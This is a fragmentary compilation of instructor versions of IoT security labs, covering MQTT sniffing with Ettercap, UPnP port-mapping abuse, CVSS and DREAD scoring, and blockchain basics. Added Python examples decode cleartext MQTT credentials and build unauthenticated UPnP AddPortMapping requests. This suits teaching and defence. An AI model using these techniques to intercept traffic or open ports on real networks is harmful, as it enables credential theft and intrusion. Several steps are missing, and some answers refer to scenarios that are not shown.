Part 1: Setting up a Publishing/Subscriber MQTT Infrastructure
Part 2: Sniffing Data using Kali
Part 3: Adding Username/Password Authentication
Part 4: Adding TLS protection
Background/Scenario
Message Queuing Telemetry Transport (MQTT) is a simple, lightweight publish/subscribe messaging protocol.
It is designed for IoT devices and uses minimal bandwidth and device resources, which makes it well suited to
machine-to-machine (M2M) communication. MQTT uses the IANA-registered TCP port 1883 by default. MQTT
over TLS uses the registered TCP port 8883.
The MQTT protocol uses topics as a communication avenue. MQTT topics use a hierarchical structure, similar
to a file path. The structure is used for message filtering and routing. An MQTT client can subscribe to one
topic or multiple topics using wildcards, # and +. MQTT does not allow publishing to topics using wildcards.
You can only publish to an individual topic. A published topic can be the output data from a sensor, for
example.
The MQTT broker is the server that handles communications between the publisher and subscriber. The
broker is responsible for receiving and filtering all messages and deciding which devices are interested in
which messages based on the message topic. The broker sends the messages to the clients that have
subscribed to the topic of the message.
In this lab, you will setup an MQTT infrastructure that includes a broker, publisher, and subscriber. You will
also publish MQTT messages and subscribe to MQTT topics. You will also secure MQTT communications
using username and password credentials and transport layer security (TLS). Finally, you will attack the
MQTT infrastructure by trying to intercept the MQTT communications between the clients and broker.
Instructor Note: This lab requires three Raspberry Pi devices that are configured in separate terminals
through PL-App. A fourth terminal is required to be open on the Kali VM. Managing the terminals and entering
the correct commands in the correct terminal may be a challenge for students.
The lab uses the Mosquitto broker and its client tools to create the MQTT broker, subscriber, and publisher
devices. It may be useful to have the students become familiar with Mosquitto by visiting the website and
looking at the documentation.
The lab also uses Ettercap, which is included in the Kali VM. Ettercap is a very interesting tool for creating
Man-in-the-Middle attacks. Various tutorials about Ettercap are available on the web.
e. Go to the terminal for the device that will serve as the MQTT publisher. Change the prompt by entering
the command export PS1=" \u@publisher:\w$ ".
pi@myPi_3:~$ export PS1="\u@publisher:\w$ "
pi@publisher:~$
f. The publisher sends MQTT messages using the command mosquitto_pub. Messages are sent to the
broker. The broker distributes the message to the appropriate subscribers for the topic.
pi@publisher:~$ mosquitto_pub -d -h 203.0.113.11 -t cisco/iots/user -m "This
message has been sent over MQTT"
Client mosqpub/1593-publisher sending CONNECT
Client mosqpub/1593-publisher received CONNACK
Client mosqpub/1593-publisher sending PUBLISH (d0, q0, r0, m1,
'cisco/iots/user', ... (36 bytes))
Client mosqpub/1593-publisher sending DISCONNECT
Using the man pages or other resources, what is the topic for these MQTT messages?
____________________________________________________________________________________
cisco/iots/user
g. You should see the MQTT message appear in the subscriber terminal along with a number of MQTT
status messages.
middle and is able to read and save messages that are not intended for it. The Kali VM then forwards the
messages on to the intended recipient, as you will see in the terminal for the subscriber Pi.
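Ettercap can read the traffic because MQTT without TLS is a cleartext protocol: the CONNECT packet carries the username and password as length-prefixed strings, and PUBLISH carries the topic and payload as they are. The following added example (not part of the lab) encodes a CONNECT and a QoS 0 PUBLISH in MQTT 3.1.1 wire format and decodes them the way a passive sniffer on port 1883 would. The topic and message are the ones used in the lab and the client ID reuses the name mosquitto_pub printed above; the username `iotuser` and password `S3cret!` are hypothetical.

```python
import struct

def _utf8(s):
    """MQTT UTF-8 string: two-byte big-endian length followed by the bytes."""
    b = s.encode("utf-8")
    return struct.pack("!H", len(b)) + b

def _remaining_length(n):
    """MQTT variable-length integer: 7 data bits per byte, high bit set if more follow."""
    out = bytearray()
    while True:
        byte, n = n % 128, n // 128
        if n:
            out.append(byte | 0x80)
        else:
            out.append(byte)
            return bytes(out)

def encode_connect(client_id, username=None, password=None, keepalive=60):
    """CONNECT packet (MQTT 3.1.1). Credentials travel as plain length-prefixed strings."""
    flags = 0x02                                   # clean session
    payload = _utf8(client_id)
    if username is not None:
        flags |= 0x80
        payload += _utf8(username)
    if password is not None:
        flags |= 0x40
        payload += _utf8(password)
    var_header = _utf8("MQTT") + bytes([0x04, flags]) + struct.pack("!H", keepalive)
    body = var_header + payload
    return bytes([0x10]) + _remaining_length(len(body)) + body

def encode_publish(topic, message):
    """QoS 0 PUBLISH packet: topic string, then the raw payload (no packet identifier)."""
    body = _utf8(topic) + message.encode("utf-8")
    return bytes([0x30]) + _remaining_length(len(body)) + body

def _read_remaining_length(data, pos):
    value, multiplier = 0, 1
    while True:
        byte = data[pos]
        pos += 1
        value += (byte & 0x7F) * multiplier
        if not byte & 0x80:
            return value, pos
        multiplier *= 128

def _read_utf8(data, pos):
    (n,) = struct.unpack_from("!H", data, pos)
    pos += 2
    return data[pos:pos + n].decode("utf-8"), pos + n

def decode_packet(data):
    """Decode a CONNECT or PUBLISH packet as a passive sniffer would see it."""
    ptype = data[0] >> 4
    length, pos = _read_remaining_length(data, 1)
    end = pos + length
    if ptype == 1:                                  # CONNECT
        _, pos = _read_utf8(data, pos)              # protocol name "MQTT"
        level, flags = data[pos], data[pos + 1]
        pos += 4                                    # level, flags, keepalive
        out = {"type": "CONNECT", "level": level}
        out["client_id"], pos = _read_utf8(data, pos)
        if flags & 0x80:
            out["username"], pos = _read_utf8(data, pos)
        if flags & 0x40:
            out["password"], pos = _read_utf8(data, pos)
        return out
    if ptype == 3:                                  # PUBLISH
        qos = (data[0] >> 1) & 0x03
        topic, pos = _read_utf8(data, pos)
        if qos:
            pos += 2                                # packet identifier for QoS 1 and 2
        return {"type": "PUBLISH", "topic": topic,
                "payload": data[pos:end].decode("utf-8", errors="replace")}
    return {"type": ptype}

# Constructed capture: the lab's topic and message, the client ID mosquitto_pub printed,
# and hypothetical credentials.
CAPTURE = [
    encode_connect("mosqpub/1593-publisher", username="iotuser", password="S3cret!"),
    encode_publish("cisco/iots/user", "This message has been sent over MQTT"),
]

def sniff(packets):
    """What a man-in-the-middle recovers from the forwarded TCP stream."""
    return [decode_packet(p) for p in packets]
```

The PUBLISH packet comes out at 55 bytes: a 2-byte fixed header, a 17-byte topic field and the 36-byte message that mosquitto_pub reported above. Adding the Part 3 username/password does nothing against this attacker, which is why Part 4 moves the broker to TLS on port 8883.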
Answers will vary. If the hacker were able to connect a computer to the network, the hacker could use
Wireshark to determine that MQTT was in use, the IP address of the broker, and the topics that are being
published. The hacker could then publish rogue data that could activate a safety system, perhaps turning
on fire suppression systems or shutting down equipment.
e. Copy the mosquitto configuration file named mosquitto_tls.conf from the scripts folder to the current
working directory.
pi@broker:~ $ cp /home/pi/notebooks/Course\ Materials/4.\ IoT\
Security/scripts/mosquitto_tls.conf .
No, because simple TLS provides only server-side authentication: the client verifies the broker's certificate,
but the broker does not verify the client. Authenticating clients requires client certificates (mutual TLS) or
the username/password authentication configured in Part 3.
Part 5: Clean Up
You will remove the files that were created in the lab and return the user settings to the state before this lab,
unless instructed otherwise by your instructor.
a. In the Kali VM, remove all the pcap files from the root user’s home directory.
root@kali:~# rm *.pcap
b. Use Ctrl+C in the broker and subscriber terminals to terminate the MQTT processes.
c. For the publisher and the subscriber, remove the TLS certificates.
pi@publisher:~$ rm ca.crt
rm: remove write-protected regular file 'ca.crt'? yes
d. For the broker, remove all the certificates and mosquitto configuration files in the pi user’s home directory.
pi@broker:~$ rm ca.* *.conf localhost.* *.sh passwords
rm: remove write-protected regular file 'ca.crt'? yes
rm: remove write-protected regular file 'ca.key'? yes
rm: remove write-protected regular file 'localhost.crt'? yes
rm: remove write-protected regular file 'localhost.key'? yes
e. For the broker, restore the file permission for the mosquitto.log file.
pi@broker:~$ sudo chmod 644 /var/log/mosquitto/mosquitto.log
f. For the broker, remove the user pi from the mosquitto group.
pi@broker:~$ sudo deluser pi mosquitto
Removing user `pi' from group `mosquitto' ...
Done.
Lab – UPnP Vulnerabilities (Instructor Version)
Instructor Note: Red font color and completed code cells indicate that the information appears in the instructor
copy only.
Lab Topology
Connectivity requirements. As shown in the topology, the Raspberry Pi will be configured as a wireless client and
a wired router, requiring a second network connection. The Raspberry Pi and the PL-App/Kali host can be directly
connected. The switch is included in the topology to indicate that the Raspberry Pi could act as a gateway to an
entire network of hosts in its role as router between the internal and external networks.
Addressing
The Pi will acquire an address from the external network, while providing addresses to the internal network.
Objectives
Part 1: Configuring the Raspberry Pi as a wired router using a BASH script
Part 2: Connecting a Client to the Raspberry Pi
Part 3: Testing Ports using UPnP
Background / Scenario
Many home routers are Linux-based. To ease connectivity challenges, they offer services such as DHCP,
NAT, UPnP, and more. They also offer both wired and wireless connections to the local network while
protecting users from threats from the Internet. Unfortunately, these routers can be tricked to open various
ports that will permit access to the internal network by threat actors from the Internet.
In this lab, you will turn a Raspberry Pi into a working router. Unlike most routers, the Raspberry Pi will
connect to the network wirelessly using PL-App, and route wireless traffic into a local wired Ethernet network.
A client will be added and connectivity will be tested. The client will then use Universal Plug and Play (UPnP)
to open a communication port through the router without authentication.
Required Resources
• PC or laptop
• IoTSec Kali VM
• 8 GB Micro SD card (minimum required) with PL-App installed
• Raspberry Pi 3, Model B or later
• A wireless network connection
• Ethernet cables
• A switch
Predictable network interface names containing MAC addresses are becoming increasingly common.
Because they may break the script used in this lab, raspi-config may be used to transition back to traditional
interface names (eth0, eth1, wlan0, etc.). To learn more, read the following:
https://www.freedesktop.org/wiki/Software/systemd/PredictableNetworkInterfaceNames/
f. Enter the information for the SSID and password of your wireless network. Click OK to continue. Click
Yes when prompted to continue making changes to config. The SSID and password may be provided by
your instructor.
g. Open a terminal from the PL-App. Enter ifconfig to verify that the Raspberry Pi device is connected to the
WiFi network.
(pl-app) root@myPi:/home/pi/notebooks# ifconfig
<output omitted>
wlan0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 192.168.11.201 netmask 255.255.255.0 broadcast 192.168.11.255
inet6 fe80::7859:df95:f2de:59f2 prefixlen 64 scopeid 0x20<link>
ether b8:27:eb:38:e8:65 txqueuelen 1000 (Ethernet)
RX packets 71 bytes 6193 (6.0 KiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 383 bytes 42370 (41.3 KiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
Step 2: Verify open ports and create a new mapping using Linux.
A router should isolate the Internet from the LAN behind it. Ideally devices on the Internet would not be able to
open connections to devices in the LAN behind the router. UPnP allows an internal device to ask the router to
open a port in its firewall, allowing devices out on the Internet to reach the internal device. While there are a
few special cases where this is desirable, more often than not, allowing internal devices to use UPnP to open
ports is bad practice.
In this step, we will use the iptables Linux kernel firewall utility to observe the behavior of UPnP on the Pi.
a. Use the following command on the Raspberry Pi to view the firewall rules, including the rules that forward
traffic between the internal and external networks. Note which ports, if any, are already open.
(pl-app) root@myPi:/home/pi/notebooks# iptables -S
-P INPUT ACCEPT
-P FORWARD ACCEPT
-P OUTPUT ACCEPT
<some output omitted>
-A FORWARD -i wlan0 -o eth0 -m state --state RELATED,ESTABLISHED -j ACCEPT
-A FORWARD -i eth0 -o wlan0 -j ACCEPT
b. Use the netstat -tuna command to list the services (and their ports) running on the Pi.
(pl-app) root@myPi:/home/pi/notebooks# netstat -tuna
Is there a service running on port 49152? What service often listens to that port? Perform a Google
search and record your answer below.
____________________________________________________________________________________
____________________________________________________________________________________
Yes, a service is running on TCP port 49152. Research on the Internet shows that Linux IGD (the UPnP Internet
Gateway Device daemon) serves its UPnP device description and control interface on port 49152; that port is
implementation-specific, not a standard. The only standardized UPnP port is UDP 1900, used by SSDP for
device discovery, and it is also open on the Pi.
c. Before upnpc in the Kali VM can communicate with the Raspberry Pi, you must create a default route
pointing to the Pi. In the Kali VM, enter the following command:
root@kali:~# ip route add default via 203.0.113.254
Instructor Note: This default route should NOT be necessary as the Pi and Kali belong to the same
network. However, because of an upnpc implementation decision, communication cannot be established
without a default route.
d. In a terminal on the IoTSec Kali VM, you will use upnpc to simulate an internal UPnP-ready device.
upnpc is a UPnP client. Use the upnpc command to create a port mapping on the Raspberry Pi router.
In this case, the client’s IP is 203.0.113.1 (Kali’s IP). The command requests that the router expose the
client’s SSH port (port 22) to the Internet as port 1337, much as an IoT device would.
root@kali:~# upnpc -a 203.0.113.1 22 1337 tcp
upnpc : miniupnpc library test client, version 2.0.
(c) 2005-2017 Thomas Bernard.
Go to http://miniupnp.free.fr/ or https://miniupnp.tuxfamily.org/
for more information.
List of UPNP devices found on the network :
desc: http://203.0.113.254:49152/gatedesc.xml
st: urn:schemas-upnp-org:device:InternetGatewayDevice:1
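What upnpc does above is three unauthenticated steps: an SSDP M-SEARCH on UDP 1900, an HTTP GET of the device description (gatedesc.xml on port 49152 here) to find the WANIPConnection control URL, and a SOAP POST of the AddPortMapping action to that URL. The following added example (not from the lab) builds and parses those messages offline. The SSDP reply and the description XML are constructed samples modelled on the output above, and the control path /upnp/control/WANIPConn1 is an assumption. Nothing in the resulting SOAP request identifies or authenticates the requester.

```python
import xml.etree.ElementTree as ET

SSDP_ADDR, SSDP_PORT = "239.255.255.250", 1900
IGD_ST = "urn:schemas-upnp-org:device:InternetGatewayDevice:1"
WANIP = "urn:schemas-upnp-org:service:WANIPConnection:1"
DEVICE_NS = "urn:schemas-upnp-org:device-1-0"

def build_msearch(st=IGD_ST, mx=2):
    """Step 1: SSDP discovery request, multicast to 239.255.255.250 on UDP 1900."""
    return ("M-SEARCH * HTTP/1.1\r\n"
            f"HOST: {SSDP_ADDR}:{SSDP_PORT}\r\n"
            'MAN: "ssdp:discover"\r\n'
            f"MX: {mx}\r\n"
            f"ST: {st}\r\n\r\n").encode()

def parse_ssdp_response(raw):
    """Parse the unicast reply into a dict keyed by lower-cased header name."""
    headers = {}
    for line in raw.decode(errors="replace").split("\r\n")[1:]:
        if ":" in line:
            key, _, value = line.partition(":")
            headers[key.strip().lower()] = value.strip()
    return headers

def find_control_url(description_xml, service_type=WANIP):
    """Step 2: walk the device description and return the service's controlURL."""
    root = ET.fromstring(description_xml)
    for svc in root.iter(f"{{{DEVICE_NS}}}service"):
        if svc.findtext(f"{{{DEVICE_NS}}}serviceType") == service_type:
            return svc.findtext(f"{{{DEVICE_NS}}}controlURL")
    return None

def build_add_port_mapping(internal_client, internal_port, external_port,
                           protocol="TCP", description="upnpc example"):
    """Step 3: SOAP body of AddPortMapping. Note that it carries no credential at all."""
    return (
        '<?xml version="1.0"?>'
        '<s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" '
        's:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body>'
        f'<u:AddPortMapping xmlns:u="{WANIP}">'
        "<NewRemoteHost></NewRemoteHost>"
        f"<NewExternalPort>{external_port}</NewExternalPort>"
        f"<NewProtocol>{protocol}</NewProtocol>"
        f"<NewInternalPort>{internal_port}</NewInternalPort>"
        f"<NewInternalClient>{internal_client}</NewInternalClient>"
        "<NewEnabled>1</NewEnabled>"
        f"<NewPortMappingDescription>{description}</NewPortMappingDescription>"
        "<NewLeaseDuration>0</NewLeaseDuration>"
        "</u:AddPortMapping></s:Body></s:Envelope>"
    )

# Constructed samples modelled on the lab's upnpc output; the control path is an assumption.
SAMPLE_RESPONSE = (b"HTTP/1.1 200 OK\r\n"
                   b"CACHE-CONTROL: max-age=1800\r\n"
                   b"LOCATION: http://203.0.113.254:49152/gatedesc.xml\r\n"
                   b"ST: urn:schemas-upnp-org:device:InternetGatewayDevice:1\r\n\r\n")

SAMPLE_DESC = f"""<?xml version="1.0"?>
<root xmlns="{DEVICE_NS}">
  <device>
    <deviceType>{IGD_ST}</deviceType>
    <deviceList><device><deviceList><device>
      <serviceList><service>
        <serviceType>{WANIP}</serviceType>
        <controlURL>/upnp/control/WANIPConn1</controlURL>
      </service></serviceList>
    </device></deviceList></device></deviceList>
  </device>
</root>"""

def plan_mapping(ssdp_reply, description_xml, internal_client, internal_port, external_port):
    """Chain the three steps offline and return the HTTP request a client would send."""
    location = parse_ssdp_response(ssdp_reply)["location"]
    scheme, _, host_port, _ = location.split("/", 3)
    control_url = f"{scheme}//{host_port}{find_control_url(description_xml)}"
    return {"control_url": control_url,
            "soap_action": f"{WANIP}#AddPortMapping",
            "body": build_add_port_mapping(internal_client, internal_port, external_port)}
```

The same three steps are all a compromised IoT device on the LAN needs in order to expose itself, or another internal host, to the Internet; the router has no way to tell that request from a legitimate one.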
[0] 203.0.113.254:49152
j. Using the ID provided by the list in [ ], enter host get 0 to request more information in this example. Then
enter host summary 0 to display the results.
upnp> host get 0
Requesting device and service info for 203.0.113.254:49152 (this could take a
few seconds)...
Failed to retrieve actions from service actions list for service urn:schemas-
dummy-com:service:Dummy:1!
Host data enumeration complete!
Host: 203.0.113.254:49152
XML File: http://203.0.113.254:49152/gatedesc.xml
<output omitted>
k. Type exit to leave miranda.
Reflection
1. What is UPnP commonly used for in home networks?
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
UPnP simplifies the setup of many home network devices such as printers, media servers, IoT devices and
digital assistants.
2. Consider your home network connection. Is UPnP running? What can be done to turn this service off?
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
Answers will vary because students' home networks differ.
3. How can an attacker using a vulnerable IoT device take advantage of a UPnP-enabled router?
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
Answers will vary. The key here is that attackers can use compromised IoT devices as UPnP clients and
expose internal devices to the Internet.
Lab - Using the CVSS (Instructor Version)
Instructor Note: Red font color or gray highlights indicate text that appears in the instructor copy only.
Objectives
In this lab, you will research the metrics that make up a CVSS score and use the CVSS calculator to determine
the severity of a described vulnerability.
Part 1: Researching the Details of the CVSS Metrics Used to Compute the CVSS Score
Part 2: Using the CVSS Calculator to Determine the Severity Level of a Vulnerability
Part 3: Reflecting on the Use and Results of the CVSS Calculator
Background / Scenario
CVSS refers to the Common Vulnerability Scoring System. It is a vendor-neutral, industry standard that offers
an open framework for conveying the severity of vulnerabilities. It helps to determine the urgency and priority
of responses to vulnerabilities. The CVSS model is designed to provide users with an overall composite score
representing the severity and risk of a vulnerability.
The results of a CVSS calculation are based on metrics and formulas. The metrics are in three distinct
categories that can be quantitatively or qualitatively measured.
This lab will provide you with a security vulnerability scenario, and it will be your job to use the CVSS
calculator and specification document to determine what the Base Score is.
Required Resources
• PC or mobile device with Internet access
Part 1: Researching the Details of the CVSS Metrics Used to Compute the
CVSS Score
To use the CVSS risk assessment scoring system, it is important to understand each of the metrics that are
used in the calculation. The Forum of Incident Response and Security Teams (FIRST) has been designated
as the custodian of the CVSS to promote its adoption globally. Their specification document is very useful in
helping to understand each of the metrics. The following URL describes the metrics used when calculating a
CVSS score:
https://www.first.org/cvss/specification-document
a. Navigate to the CVSS specification document link provided above. Use this resource to answer the
questions below.
List the three metric groups and briefly describe each of them.
____________________________________________________________________________________
____________________________________________________________________________________
____________________________________________________________________________________
____________________________________________________________________________________
____________________________________________________________________________________
Base – represents the characteristics of a vulnerability that are constant over time and across user
environments. The Base metric group is further broken down into the Exploitability, Scope, and Impact metrics.
Temporal – Measures the characteristics of a vulnerability that may change over time, but not across user
environments.
Environmental – This measures the aspects of a vulnerability that are rooted in a specific organization’s
environment.
What is the first metric used in the Base Metrics calculation? Describe the metric and all of the possible
values for this metric.
____________________________________________________________________________________
____________________________________________________________________________________
____________________________________________________________________________________
____________________________________________________________________________________
____________________________________________________________________________________
Attack Vector (AV) – Reflects the context in which exploitation is possible, that is, how remote the attacker
can be from the vulnerable component. The more remote the attacker can be, the higher the score.
Metric values: Network (N) – the vulnerable component is bound to the network stack and the attacker’s path
is through OSI layer 3 and beyond; the vulnerability is remotely exploitable. Adjacent (A) – the attack is limited
to the same shared physical or logical network (for example the same Bluetooth range or IP subnet) and cannot
be launched across a Layer 3 boundary such as a router. Local (L) – the vulnerable component is not bound to
the network stack; the attacker needs local access (for example a logged-in session) or relies on a user to open
a malicious file. Physical (P) – the attacker must physically touch or manipulate the vulnerable component.
What is the difference between the High (H) and Low (L) values for the Attack Complexity (AC) metric?
____________________________________________________________________________________
____________________________________________________________________________________
____________________________________________________________________________________
____________________________________________________________________________________
____________________________________________________________________________________
The Low value indicates that specialized access conditions or extenuating circumstances do not exist; an
attacker can expect repeatable success against the vulnerable component. The High value means that a
successful attack depends on conditions beyond the attacker’s control, such as winning a race condition or
first gathering target-specific information.
b. Read through the remaining metrics and their possible values for each of the components of for the Base
Metrics. Knowing where to find this information will be required for the next part of this lab.
For this part, we will use the CVSS Calculator from FIRST.org:
https://www.first.org/cvss/calculator/3.0
a. Navigate to the link for the calculator.
b. Select the appropriate values based on the description above for the Base Score.
What is the Base Score for the vulnerability described above?
____________________________________________________________________________________
____________________________________________________________________________________
Base Score: 9.1 (Critical) – CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H
Lab – Assess Risk with DREAD (Instructor Version)
Instructor Note: Red font color or gray highlights indicate text that appears in the instructor copy only.
Objectives
In this lab, you will use the DREAD risk assessment model to assess risk.
Part 1: Using the DREAD Scoring System to Assess Risk
Part 2: Using the DREAD System to Assess the Risk of a Described Vulnerability
Part 3: Reflecting on the Use of the DREAD Scoring System
Background / Scenario
DREAD is a risk assessment model used to quantify the risk posed by security threats. It is not a vulnerability
assessment tool; it is one part of a risk assessment. The two differ because a risk is a vulnerability that has
been evaluated in the context of a specific organization, taking into account factors such as previous attacks.
The same vulnerability may present vastly different levels of risk depending on the nature of the organization.
There are 5 categories used to compute the result:
o Damage Potential – If the threat is exploited, what is the damage potential?
o Reproducibility – How reproducible is the vulnerability?
o Exploitability – How difficult is it for the vulnerability to be exploited?
o Affected Users – What is the scale of the attack? How many users are affected by this vulnerability?
o Discoverability – How difficult is it to discover the attack?
There are multiple ways to score the DREAD risk assessment model. Microsoft, which introduced DREAD
alongside its STRIDE threat classification, scores each category 1, 2, or 3, with 3 indicating the highest risk.
However, for this lab, we will be using the scoring system described by OWASP at the following link:
https://www.owasp.org/index.php/Threat_Risk_Modeling#DREAD
OWASP uses a scoring system of 0, 5, or 10 for each category with 10 indicating a more serious risk, and 0
indicating no risk. Discoverability is the only category that offers an additional option of 9. It is important to
refer back to this document when scoring each category for Part 1 of this lab.
Required Resources
PC or mobile device with Internet access
How would you score a threat that if exploited would cause complete system or data destruction?
____________________________________________________________________________________
10
How would you score a threat that anyone can find the details on how to exploit by using a search
engine?
____________________________________________________________________________________
9
Weighting could be implemented for each category. Numbers between 0 and 5 or 5 and 10 could be used for
each category to make it more granular.
What are some of the features or advantages of the DREAD system?
_______________________________________________________________________________________
_______________________________________________________________________________________
DREAD is very simple to use and understand. DREAD can be easily used to compare and prioritize risks in
order to determine which ones to handle first.
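As an added worked example (not part of the Cisco lab), the following Python scores a few constructed threats on the OWASP 0/5/10 scale described above, rejects ratings that are not allowed values, and ranks the threats so the highest risk is handled first. The equal-weight rating is OWASP's DREAD formula (sum of the five categories divided by 5); the optional per-category weights are an assumed extension illustrating the weighting mentioned above.

```python
# Added example (not part of the Cisco lab): score threats with DREAD on the
# OWASP 0/5/10 scale the lab refers to, then rank them, optionally weighted.

# Allowed values: 0, 5 or 10 everywhere; Discoverability alone also offers 9.
ALLOWED = {
    "damage": {0, 5, 10},
    "reproducibility": {0, 5, 10},
    "exploitability": {0, 5, 10},
    "affected_users": {0, 5, 10},
    "discoverability": {0, 5, 9, 10},
}
CATEGORIES = list(ALLOWED)


def dread_score(ratings, weights=None):
    """Risk rating for one threat: the (weighted) mean of the five categories.
    With equal weights this is OWASP's sum-of-five divided by 5; `weights` is
    an assumed extension for the per-category weighting the lab mentions."""
    for cat in CATEGORIES:
        if cat not in ratings:
            raise ValueError(f"missing category: {cat}")
        if ratings[cat] not in ALLOWED[cat]:
            raise ValueError(f"{cat}={ratings[cat]} not one of {sorted(ALLOWED[cat])}")
    if weights is None:
        weights = {cat: 1 for cat in CATEGORIES}
    total_weight = sum(weights[cat] for cat in CATEGORIES)
    return sum(ratings[cat] * weights[cat] for cat in CATEGORIES) / total_weight


def prioritize(threats, weights=None):
    """Rank threats (dict name -> ratings) from highest to lowest risk."""
    scored = [(name, dread_score(r, weights)) for name, r in threats.items()]
    return sorted(scored, key=lambda item: item[1], reverse=True)


# Constructed sample threats with illustrative ratings (not from the lab).
THREATS = {
    "default credentials on device web interface": {
        "damage": 10, "reproducibility": 10, "exploitability": 10,
        "affected_users": 5, "discoverability": 9},
    "stack trace shown on error page": {
        "damage": 5, "reproducibility": 10, "exploitability": 5,
        "affected_users": 5, "discoverability": 10},
    "rare race condition in session cleanup": {
        "damage": 5, "reproducibility": 5, "exploitability": 0,
        "affected_users": 10, "discoverability": 0},
}

if __name__ == "__main__":
    for name, score in prioritize(THREATS):
        print(f"{score:5.1f}  {name}")
```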
Lab – Blockchain Demo 2.0 (Instructor Version)
Instructor Note: Red font color or gray highlights indicate text that appears in the instructor copy only.
Objectives
Complete the Blockchain Demo 2.0
Complete Reflection Questions
Background / Scenario
Blockchain is the technology behind the cryptocurrency bitcoin. It uses a distributed database to
cryptographically secure transactions. Blockchain transactions are immutable.
In this lab, you will complete the Blockchain Demo 2.0 created by freeCodeCamp and answer some questions
about this technological innovation.
Instructor Note: Students should still be able to complete this lab if the website link is broken or no longer
available.
Required Resources
• A computer with Internet access
Reflection
1. What is the name of the first block created in a blockchain and what is its index value?
_______________________________________________________________________________________
_______________________________________________________________________________________
The first block is called the genesis block and its index value is 0.
2. List the six pieces of information stored in a block.
_______________________________________________________________________________________
_______________________________________________________________________________________
Each block includes the following information: index, timestamp, hash, previous hash, data, and nonce.
3. What is the purpose of the timestamp?
_______________________________________________________________________________________
_______________________________________________________________________________________
The timestamp is used to order the blockchain transactions.
10. How does a peer make sure all other peers have the latest and longest blockchain?
_______________________________________________________________________________________
_______________________________________________________________________________________
The peer broadcasts its latest blocks to all its peers. The timestamp determines who has the latest block.
11. Why is blockchain considered immutable?
_______________________________________________________________________________________
_______________________________________________________________________________________
As more blocks are added to the blockchain, early blocks become harder to hack. The hacker would have to
mine faster than the rest of the network, which would take massive processing power. In addition, the hacker
would have to own 51% or more of the peers.
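As an added example (not the freeCodeCamp demo's code or the lab's), the Python below builds a small chain with the six fields listed in question 2, mines each block, validates the chain, and applies the longest-valid-chain rule from question 10; it assumes SHA-256, a proof-of-work target of 3 leading zeros (smaller than real networks so it runs quickly), and constructed timestamps and transaction data.

```python
# Added example (not part of the Cisco lab or the freeCodeCamp demo): a minimal
# blockchain showing why altering an early block invalidates everything after it.
import hashlib
import json

DIFFICULTY = 3  # assumption: hash must start with this many zeros (kept small for speed)


def compute_hash(index, timestamp, previous_hash, data, nonce):
    """SHA-256 over every field except the hash itself."""
    payload = json.dumps([index, timestamp, previous_hash, data, nonce])
    return hashlib.sha256(payload.encode()).hexdigest()


def mine_block(index, timestamp, previous_hash, data):
    """Search for a nonce whose hash meets the target; return the six-field block."""
    nonce = 0
    while True:
        digest = compute_hash(index, timestamp, previous_hash, data, nonce)
        if digest.startswith("0" * DIFFICULTY):
            return {"index": index, "timestamp": timestamp, "hash": digest,
                    "previous_hash": previous_hash, "data": data, "nonce": nonce}
        nonce += 1


def build_chain(entries, start_time=1_700_000_000):
    """Genesis block at index 0, then one block per entry, linked by previous_hash."""
    chain = [mine_block(0, start_time, "0" * 64, "genesis")]
    for i, data in enumerate(entries, start=1):
        chain.append(mine_block(i, start_time + i, chain[-1]["hash"], data))
    return chain


def is_valid_chain(chain):
    """Check each block's index, stored hash, proof of work and link to its predecessor."""
    for i, block in enumerate(chain):
        fields = (block["index"], block["timestamp"], block["previous_hash"],
                  block["data"], block["nonce"])
        if block["index"] != i or compute_hash(*fields) != block["hash"]:
            return False
        if not block["hash"].startswith("0" * DIFFICULTY):
            return False
        if i > 0 and block["previous_hash"] != chain[i - 1]["hash"]:
            return False
    return True


def choose_chain(local, received):
    """Longest-chain rule: adopt a received chain only if it is valid and longer."""
    if len(received) > len(local) and is_valid_chain(received):
        return received
    return local
```

Changing the data in one block and even re-mining that block still fails validation, because the next block's previous_hash no longer matches, which is why an attacker would need to re-mine every later block faster than the rest of the network.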